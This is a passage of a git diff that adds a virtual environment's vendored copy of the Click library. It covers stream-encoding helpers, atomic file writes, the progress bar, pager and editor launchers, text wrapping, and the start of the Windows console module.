force_readable + self._force_writable = force_writable + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._stream, name) + + def read1(self, size: int) -> bytes: + f = getattr(self._stream, "read1", None) + + if f is not None: + return t.cast(bytes, f(size)) + + return self._stream.read(size) + + def readable(self) -> bool: + if self._force_readable: + return True + x = getattr(self._stream, "readable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.read(0) + except Exception: + return False + return True + + def writable(self) -> bool: + if self._force_writable: + return True + x = getattr(self._stream, "writable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.write("") # type: ignore + except Exception: + try: + self._stream.write(b"") + except Exception: + return False + return True + + def seekable(self) -> bool: + x = getattr(self._stream, "seekable", None) + if x is not None: + return t.cast(bool, x()) + try: + self._stream.seek(self._stream.tell()) + except Exception: + return False + return True + + +def _is_binary_reader(stream: t.IO[t.Any], default: bool = False) -> bool: + try: + return isinstance(stream.read(0), bytes) + except Exception: + return default + # This happens in some cases where the stream was already + # closed. In this case, we assume the default. + + +def _is_binary_writer(stream: t.IO[t.Any], default: bool = False) -> bool: + try: + stream.write(b"") + except Exception: + try: + stream.write("") + return False + except Exception: + pass + return default + return True + + +def _find_binary_reader(stream: t.IO[t.Any]) -> t.Optional[t.BinaryIO]: + # We need to figure out if the given stream is already binary. + # This can happen because the official docs recommend detaching + # the streams to get binary streams. Some code might do this, so + # we need to deal with this case explicitly. + if _is_binary_reader(stream, False): + return t.cast(t.BinaryIO, stream) + + buf = getattr(stream, "buffer", None) + + # Same situation here; this time we assume that the buffer is + # actually binary in case it's closed. + if buf is not None and _is_binary_reader(buf, True): + return t.cast(t.BinaryIO, buf) + + return None + + +def _find_binary_writer(stream: t.IO[t.Any]) -> t.Optional[t.BinaryIO]: + # We need to figure out if the given stream is already binary. + # This can happen because the official docs recommend detaching + # the streams to get binary streams. Some code might do this, so + # we need to deal with this case explicitly. + if _is_binary_writer(stream, False): + return t.cast(t.BinaryIO, stream) + + buf = getattr(stream, "buffer", None) + + # Same situation here; this time we assume that the buffer is + # actually binary in case it's closed. + if buf is not None and _is_binary_writer(buf, True): + return t.cast(t.BinaryIO, buf) + + return None + + +def _stream_is_misconfigured(stream: t.TextIO) -> bool: + """A stream is misconfigured if its encoding is ASCII.""" + # If the stream does not have an encoding set, we assume it's set + # to ASCII. This appears to happen in certain unittest + # environments. It's not quite clear what the correct behavior is + # but this at least will force Click to recover somehow. + return is_ascii_encoding(getattr(stream, "encoding", None) or "ascii") + + +def _is_compat_stream_attr(stream: t.TextIO, attr: str, value: t.Optional[str]) -> bool: + """A stream attribute is compatible if it is equal to the + desired value or the desired value is unset and the attribute + has a value. + """ + stream_value = getattr(stream, attr, None) + return stream_value == value or (value is None and stream_value is not None) + + +def _is_compatible_text_stream( + stream: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] +) -> bool: + """Check if a stream's encoding and errors attributes are + compatible with the desired values. + """ + return _is_compat_stream_attr( + stream, "encoding", encoding + ) and _is_compat_stream_attr(stream, "errors", errors) + + +def _force_correct_text_stream( + text_stream: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + is_binary: t.Callable[[t.IO[t.Any], bool], bool], + find_binary: t.Callable[[t.IO[t.Any]], t.Optional[t.BinaryIO]], + force_readable: bool = False, + force_writable: bool = False, +) -> t.TextIO: + if is_binary(text_stream, False): + binary_reader = t.cast(t.BinaryIO, text_stream) + else: + text_stream = t.cast(t.TextIO, text_stream) + # If the stream looks compatible, and won't default to a + # misconfigured ascii encoding, return it as-is. + if _is_compatible_text_stream(text_stream, encoding, errors) and not ( + encoding is None and _stream_is_misconfigured(text_stream) + ): + return text_stream + + # Otherwise, get the underlying binary reader. + possible_binary_reader = find_binary(text_stream) + + # If that's not possible, silently use the original reader + # and get mojibake instead of exceptions. + if possible_binary_reader is None: + return text_stream + + binary_reader = possible_binary_reader + + # Default errors to replace instead of strict in order to get + # something that works. + if errors is None: + errors = "replace" + + # Wrap the binary stream in a text stream with the correct + # encoding parameters. + return _make_text_stream( + binary_reader, + encoding, + errors, + force_readable=force_readable, + force_writable=force_writable, + ) + + +def _force_correct_text_reader( + text_reader: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, +) -> t.TextIO: + return _force_correct_text_stream( + text_reader, + encoding, + errors, + _is_binary_reader, + _find_binary_reader, + force_readable=force_readable, + ) + + +def _force_correct_text_writer( + text_writer: t.IO[t.Any], + encoding: t.Optional[str], + errors: t.Optional[str], + force_writable: bool = False, +) -> t.TextIO: + return _force_correct_text_stream( + text_writer, + encoding, + errors, + _is_binary_writer, + _find_binary_writer, + force_writable=force_writable, + ) + + +def get_binary_stdin() -> t.BinaryIO: + reader = _find_binary_reader(sys.stdin) + if reader is None: + raise RuntimeError("Was not able to determine binary stream for sys.stdin.") + return reader + + +def get_binary_stdout() -> t.BinaryIO: + writer = _find_binary_writer(sys.stdout) + if writer is None: + raise RuntimeError("Was not able to determine binary stream for sys.stdout.") + return writer + + +def get_binary_stderr() -> t.BinaryIO: + writer = _find_binary_writer(sys.stderr) + if writer is None: + raise RuntimeError("Was not able to determine binary stream for sys.stderr.") + return writer + + +def get_text_stdin( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stdin, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_reader(sys.stdin, encoding, errors, force_readable=True) + + +def get_text_stdout( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stdout, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_writer(sys.stdout, encoding, errors, force_writable=True) + + +def get_text_stderr( + encoding: t.Optional[str] = None, errors: t.Optional[str] = None +) -> t.TextIO: + rv = _get_windows_console_stream(sys.stderr, encoding, errors) + if rv is not None: + return rv + return _force_correct_text_writer(sys.stderr, encoding, errors, force_writable=True) + + +def _wrap_io_open( + file: t.Union[str, "os.PathLike[str]", int], + mode: str, + encoding: t.Optional[str], + errors: t.Optional[str], +) -> t.IO[t.Any]: + """Handles not passing ``encoding`` and ``errors`` in binary mode.""" + if "b" in mode: + return open(file, mode) + + return open(file, mode, encoding=encoding, errors=errors) + + +def open_stream( + filename: "t.Union[str, os.PathLike[str]]", + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + atomic: bool = False, +) -> t.Tuple[t.IO[t.Any], bool]: + binary = "b" in mode + filename = os.fspath(filename) + + # Standard streams first. These are simple because they ignore the + # atomic flag. Use fsdecode to handle Path("-"). + if os.fsdecode(filename) == "-": + if any(m in mode for m in ["w", "a", "x"]): + if binary: + return get_binary_stdout(), False + return get_text_stdout(encoding=encoding, errors=errors), False + if binary: + return get_binary_stdin(), False + return get_text_stdin(encoding=encoding, errors=errors), False + + # Non-atomic writes directly go out through the regular open functions. + if not atomic: + return _wrap_io_open(filename, mode, encoding, errors), True + + # Some usability stuff for atomic writes + if "a" in mode: + raise ValueError( + "Appending to an existing file is not supported, because that" + " would involve an expensive `copy`-operation to a temporary" + " file. Open the file in normal `w`-mode and copy explicitly" + " if that's what you're after." + ) + if "x" in mode: + raise ValueError("Use the `overwrite`-parameter instead.") + if "w" not in mode: + raise ValueError("Atomic writes only make sense with `w`-mode.") + + # Atomic writes are more complicated. They work by opening a file + # as a proxy in the same folder and then using the fdopen + # functionality to wrap it in a Python file. Then we wrap it in an + # atomic file that moves the file over on close. + import errno + import random + + try: + perm: t.Optional[int] = os.stat(filename).st_mode + except OSError: + perm = None + + flags = os.O_RDWR | os.O_CREAT | os.O_EXCL + + if binary: + flags |= getattr(os, "O_BINARY", 0) + + while True: + tmp_filename = os.path.join( + os.path.dirname(filename), + f".__atomic-write{random.randrange(1 << 32):08x}", + ) + try: + fd = os.open(tmp_filename, flags, 0o666 if perm is None else perm) + break + except OSError as e: + if e.errno == errno.EEXIST or ( + os.name == "nt" + and e.errno == errno.EACCES + and os.path.isdir(e.filename) + and os.access(e.filename, os.W_OK) + ): + continue + raise + + if perm is not None: + os.chmod(tmp_filename, perm) # in case perm includes bits in umask + + f = _wrap_io_open(fd, mode, encoding, errors) + af = _AtomicFile(f, tmp_filename, os.path.realpath(filename)) + return t.cast(t.IO[t.Any], af), True + + +class _AtomicFile: + def __init__(self, f: t.IO[t.Any], tmp_filename: str, real_filename: str) -> None: + self._f = f + self._tmp_filename = tmp_filename + self._real_filename = real_filename + self.closed = False + + @property + def name(self) -> str: + return self._real_filename + + def close(self, delete: bool = False) -> None: + if self.closed: + return + self._f.close() + os.replace(self._tmp_filename, self._real_filename) + self.closed = True + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._f, name) + + def __enter__(self) -> "_AtomicFile": + return self + + def __exit__(self, exc_type: t.Optional[t.Type[BaseException]], *_: t.Any) -> None: + self.close(delete=exc_type is not None) + + def __repr__(self) -> str: + return repr(self._f) + + +def strip_ansi(value: str) -> str: + return _ansi_re.sub("", value) + + +def _is_jupyter_kernel_output(stream: t.IO[t.Any]) -> bool: + while isinstance(stream, (_FixupStream, _NonClosingTextIOWrapper)): + stream = stream._stream + + return stream.__class__.__module__.startswith("ipykernel.") + + +def should_strip_ansi( + stream: t.Optional[t.IO[t.Any]] = None, color: t.Optional[bool] = None +) -> bool: + if color is None: + if stream is None: + stream = sys.stdin + return not isatty(stream) and not _is_jupyter_kernel_output(stream) + return not color + + +# On Windows, wrap the output streams with colorama to support ANSI +# color codes. +# NOTE: double check is needed so mypy does not analyze this on Linux +if sys.platform.startswith("win") and WIN: + from ._winconsole import _get_windows_console_stream + + def _get_argv_encoding() -> str: + import locale + + return locale.getpreferredencoding() + + _ansi_stream_wrappers: t.MutableMapping[t.TextIO, t.TextIO] = WeakKeyDictionary() + + def auto_wrap_for_ansi( # noqa: F811 + stream: t.TextIO, color: t.Optional[bool] = None + ) -> t.TextIO: + """Support ANSI color and style codes on Windows by wrapping a + stream with colorama. + """ + try: + cached = _ansi_stream_wrappers.get(stream) + except Exception: + cached = None + + if cached is not None: + return cached + + import colorama + + strip = should_strip_ansi(stream, color) + ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip) + rv = t.cast(t.TextIO, ansi_wrapper.stream) + _write = rv.write + + def _safe_write(s): + try: + return _write(s) + except BaseException: + ansi_wrapper.reset_all() + raise + + rv.write = _safe_write + + try: + _ansi_stream_wrappers[stream] = rv + except Exception: + pass + + return rv + +else: + + def _get_argv_encoding() -> str: + return getattr(sys.stdin, "encoding", None) or sys.getfilesystemencoding() + + def _get_windows_console_stream( + f: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] + ) -> t.Optional[t.TextIO]: + return None + + +def term_len(x: str) -> int: + return len(strip_ansi(x)) + + +def isatty(stream: t.IO[t.Any]) -> bool: + try: + return stream.isatty() + except Exception: + return False + + +def _make_cached_stream_func( + src_func: t.Callable[[], t.Optional[t.TextIO]], + wrapper_func: t.Callable[[], t.TextIO], +) -> t.Callable[[], t.Optional[t.TextIO]]: + cache: t.MutableMapping[t.TextIO, t.TextIO] = WeakKeyDictionary() + + def func() -> t.Optional[t.TextIO]: + stream = src_func() + + if stream is None: + return None + + try: + rv = cache.get(stream) + except Exception: + rv = None + if rv is not None: + return rv + rv = wrapper_func() + try: + cache[stream] = rv + except Exception: + pass + return rv + + return func + + +_default_text_stdin = _make_cached_stream_func(lambda: sys.stdin, get_text_stdin) +_default_text_stdout = _make_cached_stream_func(lambda: sys.stdout, get_text_stdout) +_default_text_stderr = _make_cached_stream_func(lambda: sys.stderr, get_text_stderr) + + +binary_streams: t.Mapping[str, t.Callable[[], t.BinaryIO]] = { + "stdin": get_binary_stdin, + "stdout": get_binary_stdout, + "stderr": get_binary_stderr, +} + +text_streams: t.Mapping[ + str, t.Callable[[t.Optional[str], t.Optional[str]], t.TextIO] +] = { + "stdin": get_text_stdin, + "stdout": get_text_stdout, + "stderr": get_text_stderr, +} diff --git a/env/Lib/site-packages/click/_termui_impl.py b/env/Lib/site-packages/click/_termui_impl.py new file mode 100644 index 00000000..f7446577 --- /dev/null +++ b/env/Lib/site-packages/click/_termui_impl.py @@ -0,0 +1,739 @@ +""" +This module contains implementations for the termui module. To keep the +import time of Click down, some infrequently used functionality is +placed in this module and only imported as needed. +""" +import contextlib +import math +import os +import sys +import time +import typing as t +from gettext import gettext as _ +from io import StringIO +from types import TracebackType + +from ._compat import _default_text_stdout +from ._compat import CYGWIN +from ._compat import get_best_encoding +from ._compat import isatty +from ._compat import open_stream +from ._compat import strip_ansi +from ._compat import term_len +from ._compat import WIN +from .exceptions import ClickException +from .utils import echo + +V = t.TypeVar("V") + +if os.name == "nt": + BEFORE_BAR = "\r" + AFTER_BAR = "\n" +else: + BEFORE_BAR = "\r\033[?25l" + AFTER_BAR = "\033[?25h\n" + + +class ProgressBar(t.Generic[V]): + def __init__( + self, + iterable: t.Optional[t.Iterable[V]], + length: t.Optional[int] = None, + fill_char: str = "#", + empty_char: str = " ", + bar_template: str = "%(bar)s", + info_sep: str = " ", + show_eta: bool = True, + show_percent: t.Optional[bool] = None, + show_pos: bool = False, + item_show_func: t.Optional[t.Callable[[t.Optional[V]], t.Optional[str]]] = None, + label: t.Optional[str] = None, + file: t.Optional[t.TextIO] = None, + color: t.Optional[bool] = None, + update_min_steps: int = 1, + width: int = 30, + ) -> None: + self.fill_char = fill_char + self.empty_char = empty_char + self.bar_template = bar_template + self.info_sep = info_sep + self.show_eta = show_eta + self.show_percent = show_percent + self.show_pos = show_pos + self.item_show_func = item_show_func + self.label: str = label or "" + + if file is None: + file = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. + if file is None: + file = StringIO() + + self.file = file + self.color = color + self.update_min_steps = update_min_steps + self._completed_intervals = 0 + self.width: int = width + self.autowidth: bool = width == 0 + + if length is None: + from operator import length_hint + + length = length_hint(iterable, -1) + + if length == -1: + length = None + if iterable is None: + if length is None: + raise TypeError("iterable or length is required") + iterable = t.cast(t.Iterable[V], range(length)) + self.iter: t.Iterable[V] = iter(iterable) + self.length = length + self.pos = 0 + self.avg: t.List[float] = [] + self.last_eta: float + self.start: float + self.start = self.last_eta = time.time() + self.eta_known: bool = False + self.finished: bool = False + self.max_width: t.Optional[int] = None + self.entered: bool = False + self.current_item: t.Optional[V] = None + self.is_hidden: bool = not isatty(self.file) + self._last_line: t.Optional[str] = None + + def __enter__(self) -> "ProgressBar[V]": + self.entered = True + self.render_progress() + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self.render_finish() + + def __iter__(self) -> t.Iterator[V]: + if not self.entered: + raise RuntimeError("You need to use progress bars in a with block.") + self.render_progress() + return self.generator() + + def __next__(self) -> V: + # Iteration is defined in terms of a generator function, + # returned by iter(self); use that to define next(). This works + # because `self.iter` is an iterable consumed by that generator, + # so it is re-entry safe. Calling `next(self.generator())` + # twice works and does "what you want". + return next(iter(self)) + + def render_finish(self) -> None: + if self.is_hidden: + return + self.file.write(AFTER_BAR) + self.file.flush() + + @property + def pct(self) -> float: + if self.finished: + return 1.0 + return min(self.pos / (float(self.length or 1) or 1), 1.0) + + @property + def time_per_iteration(self) -> float: + if not self.avg: + return 0.0 + return sum(self.avg) / float(len(self.avg)) + + @property + def eta(self) -> float: + if self.length is not None and not self.finished: + return self.time_per_iteration * (self.length - self.pos) + return 0.0 + + def format_eta(self) -> str: + if self.eta_known: + t = int(self.eta) + seconds = t % 60 + t //= 60 + minutes = t % 60 + t //= 60 + hours = t % 24 + t //= 24 + if t > 0: + return f"{t}d {hours:02}:{minutes:02}:{seconds:02}" + else: + return f"{hours:02}:{minutes:02}:{seconds:02}" + return "" + + def format_pos(self) -> str: + pos = str(self.pos) + if self.length is not None: + pos += f"/{self.length}" + return pos + + def format_pct(self) -> str: + return f"{int(self.pct * 100): 4}%"[1:] + + def format_bar(self) -> str: + if self.length is not None: + bar_length = int(self.pct * self.width) + bar = self.fill_char * bar_length + bar += self.empty_char * (self.width - bar_length) + elif self.finished: + bar = self.fill_char * self.width + else: + chars = list(self.empty_char * (self.width or 1)) + if self.time_per_iteration != 0: + chars[ + int( + (math.cos(self.pos * self.time_per_iteration) / 2.0 + 0.5) + * self.width + ) + ] = self.fill_char + bar = "".join(chars) + return bar + + def format_progress_line(self) -> str: + show_percent = self.show_percent + + info_bits = [] + if self.length is not None and show_percent is None: + show_percent = not self.show_pos + + if self.show_pos: + info_bits.append(self.format_pos()) + if show_percent: + info_bits.append(self.format_pct()) + if self.show_eta and self.eta_known and not self.finished: + info_bits.append(self.format_eta()) + if self.item_show_func is not None: + item_info = self.item_show_func(self.current_item) + if item_info is not None: + info_bits.append(item_info) + + return ( + self.bar_template + % { + "label": self.label, + "bar": self.format_bar(), + "info": self.info_sep.join(info_bits), + } + ).rstrip() + + def render_progress(self) -> None: + import shutil + + if self.is_hidden: + # Only output the label as it changes if the output is not a + # TTY. Use file=stderr if you expect to be piping stdout. + if self._last_line != self.label: + self._last_line = self.label + echo(self.label, file=self.file, color=self.color) + + return + + buf = [] + # Update width in case the terminal has been resized + if self.autowidth: + old_width = self.width + self.width = 0 + clutter_length = term_len(self.format_progress_line()) + new_width = max(0, shutil.get_terminal_size().columns - clutter_length) + if new_width < old_width: + buf.append(BEFORE_BAR) + buf.append(" " * self.max_width) # type: ignore + self.max_width = new_width + self.width = new_width + + clear_width = self.width + if self.max_width is not None: + clear_width = self.max_width + + buf.append(BEFORE_BAR) + line = self.format_progress_line() + line_len = term_len(line) + if self.max_width is None or self.max_width < line_len: + self.max_width = line_len + + buf.append(line) + buf.append(" " * (clear_width - line_len)) + line = "".join(buf) + # Render the line only if it changed. + + if line != self._last_line: + self._last_line = line + echo(line, file=self.file, color=self.color, nl=False) + self.file.flush() + + def make_step(self, n_steps: int) -> None: + self.pos += n_steps + if self.length is not None and self.pos >= self.length: + self.finished = True + + if (time.time() - self.last_eta) < 1.0: + return + + self.last_eta = time.time() + + # self.avg is a rolling list of length <= 7 of steps where steps are + # defined as time elapsed divided by the total progress through + # self.length. + if self.pos: + step = (time.time() - self.start) / self.pos + else: + step = time.time() - self.start + + self.avg = self.avg[-6:] + [step] + + self.eta_known = self.length is not None + + def update(self, n_steps: int, current_item: t.Optional[V] = None) -> None: + """Update the progress bar by advancing a specified number of + steps, and optionally set the ``current_item`` for this new + position. + + :param n_steps: Number of steps to advance. + :param current_item: Optional item to set as ``current_item`` + for the updated position. + + .. versionchanged:: 8.0 + Added the ``current_item`` optional parameter. + + .. versionchanged:: 8.0 + Only render when the number of steps meets the + ``update_min_steps`` threshold. + """ + if current_item is not None: + self.current_item = current_item + + self._completed_intervals += n_steps + + if self._completed_intervals >= self.update_min_steps: + self.make_step(self._completed_intervals) + self.render_progress() + self._completed_intervals = 0 + + def finish(self) -> None: + self.eta_known = False + self.current_item = None + self.finished = True + + def generator(self) -> t.Iterator[V]: + """Return a generator which yields the items added to the bar + during construction, and updates the progress bar *after* the + yielded block returns. + """ + # WARNING: the iterator interface for `ProgressBar` relies on + # this and only works because this is a simple generator which + # doesn't create or manage additional state. If this function + # changes, the impact should be evaluated both against + # `iter(bar)` and `next(bar)`. `next()` in particular may call + # `self.generator()` repeatedly, and this must remain safe in + # order for that interface to work. + if not self.entered: + raise RuntimeError("You need to use progress bars in a with block.") + + if self.is_hidden: + yield from self.iter + else: + for rv in self.iter: + self.current_item = rv + + # This allows show_item_func to be updated before the + # item is processed. Only trigger at the beginning of + # the update interval. + if self._completed_intervals == 0: + self.render_progress() + + yield rv + self.update(1) + + self.finish() + self.render_progress() + + +def pager(generator: t.Iterable[str], color: t.Optional[bool] = None) -> None: + """Decide what method to use for paging through text.""" + stdout = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. + if stdout is None: + stdout = StringIO() + + if not isatty(sys.stdin) or not isatty(stdout): + return _nullpager(stdout, generator, color) + pager_cmd = (os.environ.get("PAGER", None) or "").strip() + if pager_cmd: + if WIN: + return _tempfilepager(generator, pager_cmd, color) + return _pipepager(generator, pager_cmd, color) + if os.environ.get("TERM") in ("dumb", "emacs"): + return _nullpager(stdout, generator, color) + if WIN or sys.platform.startswith("os2"): + return _tempfilepager(generator, "more <", color) + if hasattr(os, "system") and os.system("(less) 2>/dev/null") == 0: + return _pipepager(generator, "less", color) + + import tempfile + + fd, filename = tempfile.mkstemp() + os.close(fd) + try: + if hasattr(os, "system") and os.system(f'more "{filename}"') == 0: + return _pipepager(generator, "more", color) + return _nullpager(stdout, generator, color) + finally: + os.unlink(filename) + + +def _pipepager(generator: t.Iterable[str], cmd: str, color: t.Optional[bool]) -> None: + """Page through text by feeding it to another program. Invoking a + pager through this might support colors. + """ + import subprocess + + env = dict(os.environ) + + # If we're piping to less we might support colors under the + # condition that + cmd_detail = cmd.rsplit("/", 1)[-1].split() + if color is None and cmd_detail[0] == "less": + less_flags = f"{os.environ.get('LESS', '')}{' '.join(cmd_detail[1:])}" + if not less_flags: + env["LESS"] = "-R" + color = True + elif "r" in less_flags or "R" in less_flags: + color = True + + c = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, env=env) + stdin = t.cast(t.BinaryIO, c.stdin) + encoding = get_best_encoding(stdin) + try: + for text in generator: + if not color: + text = strip_ansi(text) + + stdin.write(text.encode(encoding, "replace")) + except (OSError, KeyboardInterrupt): + pass + else: + stdin.close() + + # Less doesn't respect ^C, but catches it for its own UI purposes (aborting + # search or other commands inside less). + # + # That means when the user hits ^C, the parent process (click) terminates, + # but less is still alive, paging the output and messing up the terminal. + # + # If the user wants to make the pager exit on ^C, they should set + # `LESS='-K'`. It's not our decision to make. + while True: + try: + c.wait() + except KeyboardInterrupt: + pass + else: + break + + +def _tempfilepager( + generator: t.Iterable[str], cmd: str, color: t.Optional[bool] +) -> None: + """Page through text by invoking a program on a temporary file.""" + import tempfile + + fd, filename = tempfile.mkstemp() + # TODO: This never terminates if the passed generator never terminates. + text = "".join(generator) + if not color: + text = strip_ansi(text) + encoding = get_best_encoding(sys.stdout) + with open_stream(filename, "wb")[0] as f: + f.write(text.encode(encoding)) + try: + os.system(f'{cmd} "{filename}"') + finally: + os.close(fd) + os.unlink(filename) + + +def _nullpager( + stream: t.TextIO, generator: t.Iterable[str], color: t.Optional[bool] +) -> None: + """Simply print unformatted text. This is the ultimate fallback.""" + for text in generator: + if not color: + text = strip_ansi(text) + stream.write(text) + + +class Editor: + def __init__( + self, + editor: t.Optional[str] = None, + env: t.Optional[t.Mapping[str, str]] = None, + require_save: bool = True, + extension: str = ".txt", + ) -> None: + self.editor = editor + self.env = env + self.require_save = require_save + self.extension = extension + + def get_editor(self) -> str: + if self.editor is not None: + return self.editor + for key in "VISUAL", "EDITOR": + rv = os.environ.get(key) + if rv: + return rv + if WIN: + return "notepad" + for editor in "sensible-editor", "vim", "nano": + if os.system(f"which {editor} >/dev/null 2>&1") == 0: + return editor + return "vi" + + def edit_file(self, filename: str) -> None: + import subprocess + + editor = self.get_editor() + environ: t.Optional[t.Dict[str, str]] = None + + if self.env: + environ = os.environ.copy() + environ.update(self.env) + + try: + c = subprocess.Popen(f'{editor} "{filename}"', env=environ, shell=True) + exit_code = c.wait() + if exit_code != 0: + raise ClickException( + _("{editor}: Editing failed").format(editor=editor) + ) + except OSError as e: + raise ClickException( + _("{editor}: Editing failed: {e}").format(editor=editor, e=e) + ) from e + + def edit(self, text: t.Optional[t.AnyStr]) -> t.Optional[t.AnyStr]: + import tempfile + + if not text: + data = b"" + elif isinstance(text, (bytes, bytearray)): + data = text + else: + if text and not text.endswith("\n"): + text += "\n" + + if WIN: + data = text.replace("\n", "\r\n").encode("utf-8-sig") + else: + data = text.encode("utf-8") + + fd, name = tempfile.mkstemp(prefix="editor-", suffix=self.extension) + f: t.BinaryIO + + try: + with os.fdopen(fd, "wb") as f: + f.write(data) + + # If the filesystem resolution is 1 second, like Mac OS + # 10.12 Extended, or 2 seconds, like FAT32, and the editor + # closes very fast, require_save can fail. Set the modified + # time to be 2 seconds in the past to work around this. + os.utime(name, (os.path.getatime(name), os.path.getmtime(name) - 2)) + # Depending on the resolution, the exact value might not be + # recorded, so get the new recorded value. + timestamp = os.path.getmtime(name) + + self.edit_file(name) + + if self.require_save and os.path.getmtime(name) == timestamp: + return None + + with open(name, "rb") as f: + rv = f.read() + + if isinstance(text, (bytes, bytearray)): + return rv + + return rv.decode("utf-8-sig").replace("\r\n", "\n") # type: ignore + finally: + os.unlink(name) + + +def open_url(url: str, wait: bool = False, locate: bool = False) -> int: + import subprocess + + def _unquote_file(url: str) -> str: + from urllib.parse import unquote + + if url.startswith("file://"): + url = unquote(url[7:]) + + return url + + if sys.platform == "darwin": + args = ["open"] + if wait: + args.append("-W") + if locate: + args.append("-R") + args.append(_unquote_file(url)) + null = open("/dev/null", "w") + try: + return subprocess.Popen(args, stderr=null).wait() + finally: + null.close() + elif WIN: + if locate: + url = _unquote_file(url.replace('"', "")) + args = f'explorer /select,"{url}"' + else: + url = url.replace('"', "") + wait_str = "/WAIT" if wait else "" + args = f'start {wait_str} "" "{url}"' + return os.system(args) + elif CYGWIN: + if locate: + url = os.path.dirname(_unquote_file(url).replace('"', "")) + args = f'cygstart "{url}"' + else: + url = url.replace('"', "") + wait_str = "-w" if wait else "" + args = f'cygstart {wait_str} "{url}"' + return os.system(args) + + try: + if locate: + url = os.path.dirname(_unquote_file(url)) or "." + else: + url = _unquote_file(url) + c = subprocess.Popen(["xdg-open", url]) + if wait: + return c.wait() + return 0 + except OSError: + if url.startswith(("http://", "https://")) and not locate and not wait: + import webbrowser + + webbrowser.open(url) + return 0 + return 1 + + +def _translate_ch_to_exc(ch: str) -> t.Optional[BaseException]: + if ch == "\x03": + raise KeyboardInterrupt() + + if ch == "\x04" and not WIN: # Unix-like, Ctrl+D + raise EOFError() + + if ch == "\x1a" and WIN: # Windows, Ctrl+Z + raise EOFError() + + return None + + +if WIN: + import msvcrt + + @contextlib.contextmanager + def raw_terminal() -> t.Iterator[int]: + yield -1 + + def getchar(echo: bool) -> str: + # The function `getch` will return a bytes object corresponding to + # the pressed character. Since Windows 10 build 1803, it will also + # return \x00 when called a second time after pressing a regular key. + # + # `getwch` does not share this probably-bugged behavior. Moreover, it + # returns a Unicode object by default, which is what we want. + # + # Either of these functions will return \x00 or \xe0 to indicate + # a special key, and you need to call the same function again to get + # the "rest" of the code. The fun part is that \u00e0 is + # "latin small letter a with grave", so if you type that on a French + # keyboard, you _also_ get a \xe0. + # E.g., consider the Up arrow. This returns \xe0 and then \x48. The + # resulting Unicode string reads as "a with grave" + "capital H". + # This is indistinguishable from when the user actually types + # "a with grave" and then "capital H". + # + # When \xe0 is returned, we assume it's part of a special-key sequence + # and call `getwch` again, but that means that when the user types + # the \u00e0 character, `getchar` doesn't return until a second + # character is typed. + # The alternative is returning immediately, but that would mess up + # cross-platform handling of arrow keys and others that start with + # \xe0. Another option is using `getch`, but then we can't reliably + # read non-ASCII characters, because return values of `getch` are + # limited to the current 8-bit codepage. + # + # Anyway, Click doesn't claim to do this Right(tm), and using `getwch` + # is doing the right thing in more situations than with `getch`. + func: t.Callable[[], str] + + if echo: + func = msvcrt.getwche # type: ignore + else: + func = msvcrt.getwch # type: ignore + + rv = func() + + if rv in ("\x00", "\xe0"): + # \x00 and \xe0 are control characters that indicate special key, + # see above. + rv += func() + + _translate_ch_to_exc(rv) + return rv + +else: + import tty + import termios + + @contextlib.contextmanager + def raw_terminal() -> t.Iterator[int]: + f: t.Optional[t.TextIO] + fd: int + + if not isatty(sys.stdin): + f = open("/dev/tty") + fd = f.fileno() + else: + fd = sys.stdin.fileno() + f = None + + try: + old_settings = termios.tcgetattr(fd) + + try: + tty.setraw(fd) + yield fd + finally: + termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) + sys.stdout.flush() + + if f is not None: + f.close() + except termios.error: + pass + + def getchar(echo: bool) -> str: + with raw_terminal() as fd: + ch = os.read(fd, 32).decode(get_best_encoding(sys.stdin), "replace") + + if echo and isatty(sys.stdout): + sys.stdout.write(ch) + + _translate_ch_to_exc(ch) + return ch diff --git a/env/Lib/site-packages/click/_textwrap.py b/env/Lib/site-packages/click/_textwrap.py new file mode 100644 index 00000000..b47dcbd4 --- /dev/null +++ b/env/Lib/site-packages/click/_textwrap.py @@ -0,0 +1,49 @@ +import textwrap +import typing as t +from contextlib import contextmanager + + +class TextWrapper(textwrap.TextWrapper): + def _handle_long_word( + self, + reversed_chunks: t.List[str], + cur_line: t.List[str], + cur_len: int, + width: int, + ) -> None: + space_left = max(width - cur_len, 1) + + if self.break_long_words: + last = reversed_chunks[-1] + cut = last[:space_left] + res = last[space_left:] + cur_line.append(cut) + reversed_chunks[-1] = res + elif not cur_line: + cur_line.append(reversed_chunks.pop()) + + @contextmanager + def extra_indent(self, indent: str) -> t.Iterator[None]: + old_initial_indent = self.initial_indent + old_subsequent_indent = self.subsequent_indent + self.initial_indent += indent + self.subsequent_indent += indent + + try: + yield + finally: + self.initial_indent = old_initial_indent + self.subsequent_indent = old_subsequent_indent + + def indent_only(self, text: str) -> str: + rv = [] + + for idx, line in enumerate(text.splitlines()): + indent = self.initial_indent + + if idx > 0: + indent = self.subsequent_indent + + rv.append(f"{indent}{line}") + + return "\n".join(rv) diff --git a/env/Lib/site-packages/click/_winconsole.py b/env/Lib/site-packages/click/_winconsole.py new file mode 100644 index 00000000..6b20df31 --- /dev/null +++ b/env/Lib/site-packages/click/_winconsole.py @@ -0,0 +1,279 @@ +# This module is based on the excellent work by Adam Bartoš who +# provided a lot of what went into the implementation here in +# the discussion to issue1602 in the Python bug tracker. +# +# There are some general differences in regards to how this works +# compared to the 